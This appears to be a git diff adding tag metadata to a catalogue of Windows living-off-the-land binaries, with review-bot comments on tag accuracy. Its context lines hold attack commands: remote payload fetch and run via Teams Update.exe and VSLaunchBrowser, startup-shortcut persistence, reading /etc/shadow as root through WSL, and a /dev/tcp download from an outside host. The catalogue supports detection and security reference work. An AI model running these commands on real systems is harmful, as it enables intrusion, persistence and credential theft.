 - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
 Usecase: Download and execute binary
@@ -67,6 +88,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
 Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
 Usecase: Download and execute binary
@@ -74,6 +98,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: Nuget
+ - Execute: Remote
 - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
 Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
 Usecase: Execute binary
@@ -81,6 +108,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: CMD
 - Command: Update.exe --createShortcut=payload.exe -l=Startup
 Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
 Usecase: Execute binary
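Review bot: In the `@@ -60,6 +78,9` hunk the new `Tags:` block sits under the OperatingSystem line of the `Update.exe --processStart payload.exe --process-start-args "whatever args"` entry (the command that ends the preceding `@@ -53` hunk), so that entry is tagged `Execute: CMD` plus `Execute: Remote`, while the second, identical `--processStart` entry receives only `Execute: CMD` in the `@@ -81,6 +108,8` hunk. Both descriptions say the operator first copies payload.exe into %userprofile%\AppData\Local\Microsoft\Teams\current\ and Update.exe then runs that file, so nothing is fetched remotely and what executes is a local PE; `- Execute: EXE` alone, as this patch uses for `Remote.exe /s` and `VSDiagnostics.exe /launch:`, would fit both entries and keep them in agreement. This reading assumes the collapsed indentation places each `Tags:` inside the command item above it, which is the pattern in every other hunk here, so it is worth confirming against the rendered YAML.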
@@ -88,6 +117,8 @@ Commands:
 Privileges: User
 MitreID: T1547
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: EXE
 - Command: Update.exe --removeShortcut=payload.exe -l=Startup
 Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
 Usecase: Execute binary
@@ -95,6 +126,8 @@ Commands:
 Privileges: User
 MitreID: T1070
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\update.exe'
 Code_Sample:
diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml
index 88ccc8850..171367810 100644
--- a/yml/OtherMSBinaries/VSDiagnostics.yml
+++ b/yml/OtherMSBinaries/VSDiagnostics.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe"
 Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.
 Usecase: Proxy execution of binary with arguments
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
 Detection:
diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml
index 428d73075..86d34a908 100644
--- a/yml/OtherMSBinaries/VSIISExeLauncher.yml
+++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml
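Review bot: The `@@ -95,6 +126,8` hunk attaches `Execute: EXE` to the `Update.exe --removeShortcut=payload.exe -l=Startup` entry (MitreID T1070), but by its own description that command only deletes the Startup-folder shortcut created by `--createShortcut`; it launches nothing, so an Execute tag here is a false positive for anyone filtering the catalogue on execution capability. I would drop the two added lines for this entry, or, if the schema requires a tag on every command and the vocabulary has a non-execution value for cleanup entries, use that instead of `Execute`. The `Execute: EXE` placed on the `--createShortcut` (T1547) entry in the `@@ -88` hunk is defensible, since the shortcut does run payload.exe at the next logon, though it is persistence rather than direct execution. As in the other hunks, which command each `Tags:` block lands in is inferred from the collapsed context lines and should be confirmed in the rendered YAML.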
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10 and up with VS/VScode installed
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
 Code_Sample:
diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
index d3c0b05be..ed9190087 100644
--- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
+++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+ Tags:
+ - Execute: .NetObjects
 Full_Path:
 - Path: c:\Program Files (x86)\Windows Kits\10\bin\\arm64\UIAVerify\VisualUiaVerifyNative.exe
 - Path: c:\Program Files (x86)\Windows Kits\10\bin\\x64\UIAVerify\VisualUiaVerifyNative.exe
diff --git a/yml/OtherMSBinaries/VsLaunchBrowser.yml b/yml/OtherMSBinaries/VsLaunchBrowser.yml
index 723ed3481..578464cf6 100644
--- a/yml/OtherMSBinaries/VsLaunchBrowser.yml
+++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml
@@ -20,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 - Command: VSLaunchBrowser.exe .exe \\Server\Path\file
 Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
 Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
@@ -27,6 +29,9 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
+ - Execute: Remote
 Full_Path:
 - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe
 - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe
diff --git a/yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/Vshadow.yml
index 4adf4ff28..36c743df3 100644
--- a/yml/OtherMSBinaries/Vshadow.yml
+++ b/yml/OtherMSBinaries/Vshadow.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: Administrator
 MitreID: T1127
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files (x86)\Windows Kits\10\bin\\x64\vshadow.exe
 Detection:
diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml
index 9c983a5d3..e6fb2f311 100644
--- a/yml/OtherMSBinaries/Vsjitdebugger.yml
+++ b/yml/OtherMSBinaries/Vsjitdebugger.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: c:\windows\system32\vsjitdebugger.exe
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml
index e66ddb8f4..40dd2058a 100644
--- a/yml/OtherMSBinaries/Wfc.yml
+++ b/yml/OtherMSBinaries/Wfc.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+ Tags:
+ - Execute: XOML
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
 Code_Sample:
diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml
index e1493d192..92970b54f 100644
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows 10, Windows Server 2019, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: wsl.exe -u root -e cat /etc/shadow
 Description: Cats /etc/shadow file as root
 Usecase: Performs execution of arbitrary Linux commands as root without need for password.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows 10, Windows Server 2019, Windows 11
+ Tags:
+ - Execute: CMD
 - Command: wsl.exe --exec bash -c ""
 Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `)
 Usecase: Performs execution of arbitrary Linux commands.
@@ -25,6 +29,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows 10, Windows Server 2019, Windows 11
+ Tags:
+ - Execute: CMD
 - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
 Description: Downloads file from 192.168.1.10
 Usecase: Download file
diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml
index f0171ed32..91c83a708 100644
--- a/yml/OtherMSBinaries/winfile.yml
+++ b/yml/OtherMSBinaries/winfile.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Windows\System32\winfile.exe
 - Path: C:\Windows\winfile.exe